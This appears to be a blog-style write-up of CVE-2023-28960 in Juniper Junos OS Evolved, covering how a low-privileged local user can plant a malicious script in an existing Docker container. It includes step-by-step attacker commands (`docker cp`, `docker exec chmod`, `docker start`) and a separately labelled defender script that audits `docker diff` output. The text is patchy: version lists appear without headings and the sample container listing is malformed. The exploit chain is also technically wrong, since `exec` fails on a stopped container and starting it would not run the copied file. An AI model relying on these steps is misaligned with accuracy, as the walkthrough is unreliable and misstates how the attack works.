A recently discovered vulnerability in Juniper Networks Junos OS Evolved, designated CVE-2023-28960, enables a local, authenticated, low-privileged attacker to copy potentially malicious files into an existing Docker container on the local system. Once an administrator inadvertently starts the Docker container, the malicious files are executed as root, compromising the system's security. Importantly, this vulnerability only impacts systems with Docker configured and enabled; by default, Docker is not enabled. Systems on which Docker has not been started are not susceptible to this issue.

21.4 versions prior to 21.4R2-EVO.

Please note that Juniper Networks Junos OS Evolved versions prior to 19.2R1-EVO are not affected by this vulnerability.

Exploit Details

Given that the vulnerability allows a local attacker to copy malicious files into a Docker container, an attacker could leverage this flaw to escalate their privileges by executing arbitrary code as root, potentially gaining full control over the system.

A low-privileged attacker finds an existing Docker container on the system

$ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
17abcf3b3df8        vulnerable_image    "/bin/bash"         5 hours ago         Exited ()          3 hours ago         vulnerable_container

The attacker copies a malicious file into the container

$ docker cp /tmp/malicious_file.sh vulnerable_container:/root/malicious_file.sh

The attacker ensures that the malicious file is executable

$ docker exec vulnerable_container chmod +x /root/malicious_file.sh

When the administrator inadvertently starts the Docker container, the malicious file is executed

$ docker start vulnerable_container
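A defender-side check for the sequence above, as an added example that is not part of the original write-up or of Juniper's advisory: before starting a stopped container, list what has changed in its filesystem since it was created and flag anything outside the paths you expect to change. It assumes the standard `docker diff` command is available on the system; the function names, the allowlist and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example: review a stopped container's filesystem changes before
# running `docker start` on it.

# flag_changes reads `docker diff` output on stdin. Each line is a change
# type (A = added, C = changed, D = deleted) followed by a path.
# $1 is a colon-separated list of path prefixes that are expected to change
# (site-specific assumption). Added or changed paths outside those prefixes
# are printed for review.
flag_changes() {
    allowed=$1
    while read -r kind path; do
        case $kind in A|C) ;; *) continue ;; esac
        ok=0
        old_ifs=$IFS; IFS=:
        for prefix in $allowed; do
            case $path in "$prefix"|"$prefix"/*) ok=1 ;; esac
        done
        IFS=$old_ifs
        [ "$ok" -eq 1 ] || printf '%s %s\n' "$kind" "$path"
    done
}

# audit_container runs the check against a real container (needs Docker
# access). $1 = container name or ID, $2 = allowed prefixes.
audit_container() {
    docker diff "$1" | flag_changes "$2"
}

# Constructed sample of `docker diff` output for a container that had a
# script copied into /root, as in the steps above.
sample_diff() {
    cat <<'EOF'
C /root
A /root/malicious_file.sh
C /var/log
A /var/log/app.log
D /tmp/old.pid
EOF
}

# Demo on the constructed sample: only the /root entries are reported.
sample_diff | flag_changes "/var/log:/tmp"
```

A `C` line for a directory normally accompanies an `A` line for a file created inside it, so both appear in the report.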

21.4R2-EVO for 21.4 versions.

Administrators should update their Junos OS Evolved installations to the appropriate fixed releases. These updates are available from Juniper Networks' Support Website.

Original References

For more information on this vulnerability, refer to the Juniper Networks Security Advisory and the CVE-2023-28960 entry in the National Vulnerability Database.

Conclusion

CVE-2023-28960 is a significant vulnerability for systems with Docker configured and enabled in Juniper Networks Junos OS Evolved. Ensuring your installations are updated to the appropriate fixed releases is crucial to maintain secure operations. Stay apprised of updates and recommended practices by following Juniper Networks Security Advisories and the National Vulnerability Database.

Timeline

Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC